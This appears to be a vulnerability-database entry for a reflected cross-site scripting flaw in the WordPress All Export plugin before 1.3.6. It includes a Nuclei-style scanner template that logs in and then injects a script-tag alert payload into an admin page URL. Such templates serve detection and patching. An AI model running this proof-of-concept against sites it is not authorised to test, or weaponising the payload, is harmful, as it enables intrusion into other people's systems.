wp-all-export-xss: WordPress All Export <1.3.6 - Cross-Site Scripting

日期: 2025-08-01 | 影响软件: WordPress All Export | POC: 已公开

漏洞描述

WordPress All Export plugin before version 1.3.6 does not escape some URLs before outputting them back in attributes, leading to reflected cross-site scripting.

PoC代码[已公开]

id: wp-all-export-xss

info:
  name: WordPress All Export <1.3.6 - Cross-Site Scripting
  author: Akincibor
  severity: medium
  description: WordPress All Export plugin before version 1.3.6 does not escape some URLs before outputting them back in attributes, leading to reflected cross-site scripting.
  reference:
    - https://wpscan.com/vulnerability/de330a59-d64d-40be-86df-98997949e5e4
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 5.4
    cwe-id: CWE-80
  metadata:
    verified: true
    max-request: 2
  tags: wp-plugin,xss,wp,wordpress,authenticated,wpscan,vuln

http:
  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Origin: {{RootURL}}
        Content-Type: application/x-www-form-urlencoded
        Cookie: wordpress_test_cookie=WP%20Cookie%20check

        log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
      - |
        GET /wp-admin/admin.php?page=pmxe-admin-manage&a"><script>alert(1)</script> HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'manage&a\"><script>alert(1)</script>">'
          - 'Manage Exports'
        condition: and

      - type: word
        part: header
        words:
          - text/html

      - type: status
        status:
          - 200
# digest: 4a0a004730450221008c7dc7607378b872ff6c9c740f4e3565c0d0d6efd35648b797baf70f0deff7ae02202dbc82fa0265ddbc6d36e03c5195a55a01ad0209f052edb5f7cdf0e7fa170cf3:922c64590222798bb761d5b6d8e72950

相关漏洞推荐